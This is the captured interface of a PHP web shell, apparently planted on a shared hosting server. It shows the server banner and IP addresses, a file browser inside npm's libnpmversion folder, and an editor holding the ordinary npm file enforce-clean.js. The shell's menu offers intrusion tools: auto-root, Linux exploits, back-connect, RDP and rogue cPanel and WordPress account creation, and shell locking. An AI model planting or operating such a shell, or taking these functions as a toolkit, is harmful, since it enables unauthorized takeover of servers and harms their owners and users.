Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 3.144.244.117
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
alt-nodejs16 /
root /
usr /
lib /
node_modules /
npm /
node_modules.bundled /
libnpmversion /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
commit.js
425
B
-rw-r--r--
enforce-clean.js
837
B
-rw-r--r--
index.js
805
B
-rw-r--r--
read-json.js
335
B
-rw-r--r--
retrieve-tag.js
384
B
-rw-r--r--
tag.js
470
B
-rw-r--r--
version.js
3.29
KB
-rw-r--r--
write-json.js
524
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : enforce-clean.js
const git = require('@npmcli/git') const log = require('proc-log') // returns true if it's cool to do git stuff // throws if it's unclean, and not forced. module.exports = async opts => { const { force } = opts let hadError = false const clean = await git.isClean(opts).catch(er => { if (er.code === 'ENOGIT') { log.warn( 'version', 'This is a Git checkout, but the git command was not found.', 'npm could not create a Git tag for this release!' ) hadError = true // how can merges be real if our git isn't real? return true } else { throw er } }) if (!clean) { if (!force) { throw new Error('Git working directory not clean.') } log.warn('version', 'Git working directory not clean, proceeding forcefully.') } return !hadError }
Close